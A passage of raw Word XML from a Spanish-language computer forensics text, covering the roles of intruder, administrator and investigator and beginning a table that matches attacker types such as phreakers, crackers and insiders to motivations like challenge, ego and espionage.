      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BIOS</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BIOS: Basic Input/Output System, software que inicializa el hardware durante el arranque de un ordenador."</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE55E18" w14:textId="29C2CD0C" w:rsidR="000D10AB" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00565C5B">
        <w:lastRenderedPageBreak/>
        <w:t>Perspectiva de tres roles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB398BF" w14:textId="77777777" w:rsidR="00565C5B" w:rsidRPr="00565C5B" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00565C5B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>En el análisis de un caso en el que sea necesario el cómputo forense, hay tres roles principales que son importantes y se deben tener en cuenta: el intruso, el administrador y la infraestructura de la seguridad informática, al igual que el investigador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395C8F7C" w14:textId="24C61658" w:rsidR="00565C5B" w:rsidRPr="00565C5B" w:rsidRDefault="00D54AC2" w:rsidP="00565C5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00565C5B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Intrusos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A88FF1" w14:textId="67A6C91F" w:rsidR="00565C5B" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00565C5B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El intruso es aquel que ataca un sistema, hace cambios no autorizados, manipula contraseñas o cambia configuraciones, entre otras actividades que ponen a prueba la seguridad de un sistema. La intención de los intrusos es un punto clave para poder analizar el caso, ya que no se puede comparar un intruso cuya motivación es el dinero con otro cuya motivación es la demostración de sus habilidades. Jeimy J. Cano hace una comparación entre las motivaciones de diferentes tipos de atacantes en la siguiente tabla, basada en el artículo de Steven Furnell Cybercrime.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1481"/>
        <w:gridCol w:w="1684"/>
        <w:gridCol w:w="1149"/>
        <w:gridCol w:w="901"/>
        <w:gridCol w:w="1017"/>
        <w:gridCol w:w="1192"/>
        <w:gridCol w:w="1059"/>
      </w:tblGrid>
      <w:tr w:rsidR="00565C5B" w14:paraId="1B337D8D" w14:textId="77777777" w:rsidTr="00D40650">
        <w:trPr>
          <w:trHeight w:val="694"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1481" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42C8B2EA" w14:textId="22488F98" w:rsidR="00565C5B" w:rsidRPr="009440E4" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Motivaciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2884A27C" w14:textId="395EA178" w:rsidR="00565C5B" w:rsidRPr="009440E4" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ciberterroristas</w:t>
            </w:r>
            <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> XE "</w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:instrText>Ciberterroristas: Individuos o grupos que utilizan la tecnología de la información para llevar a cabo actos terroristas."</w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> </w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1149" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="035A42F8" w14:textId="75D49A25" w:rsidR="00565C5B" w:rsidRPr="009440E4" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phreakers</w:t>
            </w:r>
            <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> XE "</w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:instrText>Phreakers: Hackers que manipulan sistemas telefónicos."</w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> </w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="901" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="052F0F7C" w14:textId="77777777" w:rsidR="00565C5B" w:rsidRPr="009440E4" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Script</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38C7E85B" w14:textId="7971B959" w:rsidR="00565C5B" w:rsidRPr="009440E4" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>kiddies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6829B0BD" w14:textId="1AC4AFA1" w:rsidR="00565C5B" w:rsidRPr="009440E4" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Crackers</w:t>
            </w:r>
            <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> XE "</w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:instrText>Crackers: Individuos que rompen la seguridad informática por motivos maliciosos o para beneficio personal."</w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> </w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1192" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70A347B9" w14:textId="77777777" w:rsidR="00565C5B" w:rsidRPr="009440E4" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Desarrollo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="226E4004" w14:textId="430383F6" w:rsidR="00565C5B" w:rsidRPr="009440E4" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>de virus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1059" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66C62704" w14:textId="77777777" w:rsidR="00565C5B" w:rsidRPr="009440E4" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Atacante</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A9AAEDE" w14:textId="5AD3B00D" w:rsidR="00565C5B" w:rsidRPr="009440E4" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:ascii="SegoeUI-Bold" w:hAnsi="SegoeUI-Bold" w:cs="SegoeUI-Bold"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>interno</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565C5B" w14:paraId="4CFCF52C" w14:textId="77777777" w:rsidTr="00D40650">
        <w:trPr>
          <w:trHeight w:val="455"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1481" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21644A4A" w14:textId="222E1EFE" w:rsidR="00565C5B" w:rsidRPr="009440E4" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F82B7FA" w14:textId="77777777" w:rsidR="00565C5B" w:rsidRPr="009440E4" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1149" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74D8A30C" w14:textId="4BE23F6E" w:rsidR="00565C5B" w:rsidRPr="009440E4" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="901" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35F3EA29" w14:textId="77777777" w:rsidR="00565C5B" w:rsidRPr="009440E4" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="696B08D3" w14:textId="77777777" w:rsidR="00565C5B" w:rsidRPr="009440E4" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1192" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A3E7000" w14:textId="48D5AC58" w:rsidR="00565C5B" w:rsidRPr="009440E4" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1059" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="585B98AC" w14:textId="484187D5" w:rsidR="00565C5B" w:rsidRPr="009440E4" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E7F53" w14:paraId="152570CA" w14:textId="77777777" w:rsidTr="00D40650">
        <w:trPr>
          <w:trHeight w:val="443"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1481" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F566809" w14:textId="21799BB6" w:rsidR="005E7F53" w:rsidRPr="009440E4" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Ego</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50E1ECF2" w14:textId="77777777" w:rsidR="005E7F53" w:rsidRPr="009440E4" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1149" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="064BEB4A" w14:textId="41A8435D" w:rsidR="005E7F53" w:rsidRPr="009440E4" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="901" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="298E3486" w14:textId="6F2D2FE8" w:rsidR="005E7F53" w:rsidRPr="009440E4" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F81CCD3" w14:textId="77777777" w:rsidR="005E7F53" w:rsidRPr="009440E4" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1192" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="419B93D1" w14:textId="3393D16A" w:rsidR="005E7F53" w:rsidRPr="009440E4" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1059" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0882989D" w14:textId="77777777" w:rsidR="005E7F53" w:rsidRPr="009440E4" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E7F53" w14:paraId="4F68AB89" w14:textId="77777777" w:rsidTr="00D40650">
        <w:trPr>
          <w:trHeight w:val="443"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1481" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5864C03C" w14:textId="6CB390FF" w:rsidR="005E7F53" w:rsidRPr="009440E4" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Espionaje</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C2FA93F" w14:textId="77777777" w:rsidR="005E7F53" w:rsidRPr="009440E4" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1149" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B7C9B7F" w14:textId="77777777" w:rsidR="005E7F53" w:rsidRPr="009440E4" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="901" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36662729" w14:textId="77777777" w:rsidR="005E7F53" w:rsidRPr="009440E4" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07F92970" w14:textId="72EE9A72" w:rsidR="005E7F53" w:rsidRPr="009440E4" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1192" w:type="dxa"/>
          </w:tcPr>
